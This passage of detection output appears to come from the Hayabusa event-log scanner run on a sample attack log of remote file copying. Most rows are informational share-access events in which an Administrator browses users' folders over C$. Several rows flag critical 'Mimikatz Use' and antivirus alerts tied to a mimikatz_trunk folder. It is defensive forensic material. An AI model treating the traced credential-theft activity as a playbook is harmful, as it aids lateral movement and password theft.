10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 